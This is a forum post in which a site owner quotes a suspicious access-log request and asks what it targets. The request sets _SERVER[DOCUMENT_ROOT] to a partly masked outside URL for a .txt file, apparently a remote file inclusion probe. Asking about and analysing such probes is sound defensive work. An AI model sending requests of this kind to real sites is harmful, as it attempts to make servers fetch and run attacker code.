lucy24 - 6:46 am on Feb 19, 2013 (gmt 0)

I don't usually bother about one-offs, especially when it was literally a single request. But this one made me nervous. The resulting questions are equally divided between robots, Apache and PHP so we'll split the difference.

Verbatim except for a bit of camouflage and a strategically inserted blank space to prevent auto-linking:

85.10.207.nnn - - [16/Feb/2013:05:59:54 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http:/ /85.10.207.nnn/directory/filename.txt? HTTP/1.1" 200 3795 "http://example.org/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"

where example.org is the target site-- making the request an auto-referer-- and the 85.10. part is the visitor. Yes, it really said .txt. The IP turns out to be Hetzner (..192.0/18), so that part was a no-brainer. But...

#1 what exactly were they asking for? Is that a literal string or does the whole thing collapse to "true" or "false"? Wording exactly as shown, no leading $

#2 how come this ends up with a 200? What would an html file be doing with a query string? I don't have any AddHandler or similar funny business. Is this a config setting at the host's end, or would requests in this form always come through?

#3 where's it getting 3795 bytes? I double-checked site logs: an ordinary request for this page runs right around 1645.

All of which leads to

#4 The short answer of course is "It's up to no good". But beyond that, what exactly was it trying to do? Is this another of those attempted-proxy things?


Postscript. I'm darn glad I took the time to look into this. Closer look at logs led to the unrelated but horrifying discovery that requesting "www.example.org/index.html" results in THREE consecutive redirects. Now fixed. Brr.